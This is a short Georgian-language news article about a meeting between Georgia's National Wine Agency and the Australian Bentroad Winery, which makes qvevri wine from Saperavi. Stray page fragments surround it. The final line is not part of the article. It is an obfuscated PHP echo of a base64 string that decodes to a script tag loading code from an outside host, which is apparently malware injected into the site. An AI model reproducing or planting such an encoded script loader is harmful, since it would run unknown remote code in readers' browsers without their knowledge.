celsiusi
ავერსი შნაიდერი
ღვინის ეროვნული სააგენტოს თავმჯდომარის მოადგილე, დავით ტყემალაძე ავსტრალიური კომპანიის Bentroad Winery წარმომადგენლებს შეხვდა და ქართული ღვინის პოპულარიზაციის და მარკეტინგის სტრატეგია გააცნო. ამის შესახებ ინფორმაციას ღვინის ეროვნული სააგენტო არვცელებს.
 
მათი ცნობით, შეხვედრაზე საუბარი შეეხო ერთობლივი ღონისძიებების დაგეგმვას, რომლებმაც ხელი უნდა შეუწყოს ავსტრალიაში ქართული ღვინის ცნობადობის გაზრდას და ავსტრალიის ბაზარზე ქართული ღვინის რეალიზაციის პოტენციალის გამოყენებას.
 
„ღვინის კომპანია Bentroad Winery წლიურად 300,000 ბოთლ ღვინოს აწარმოებს.
 
2018 წელს, კომპანიამ Bentroad Winery 15 ქართული ქვევრი შეიძინა და ავსტრალიაში გაშენებული საფერავის ჯიშის ყურძნისგან ქვევრის ღვინის დამზადება დაიწყო. გარდა საფერავისა, კომპანიაში ქვევრის ღვინოს ფრანგული თეთრი ყურძნის ჯიშებისგან ამზადებენ. პროდუქციის რეალიზაციას კი, როგორც ავსტრალიის, ისე, ამერიკის ბაზარზე ახორციელებს.
 
კომპანიის წარმომადგენლების საქართველოში ვიზიტი მეღვინეობის „პი“ ორგანიზებით განხორციელდა. ვიზიტის ფარგლებში, ავსტრალიელი მეღვინეები ქართლში, კახეთში, იმერეთსა და რაჭაში ღვინის მწარმოებლებს ეწვივნენ. ავსტრალიელი მეღვინეები დაინტერესებული არიან ქართული ქვევრის ღვინის ტექნოლოგიით და ქართული ყურძნის ჯიშების მრავალფეროვნებით“,- ნათქვამია გავრცელებულ განცხადებაში.
520
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");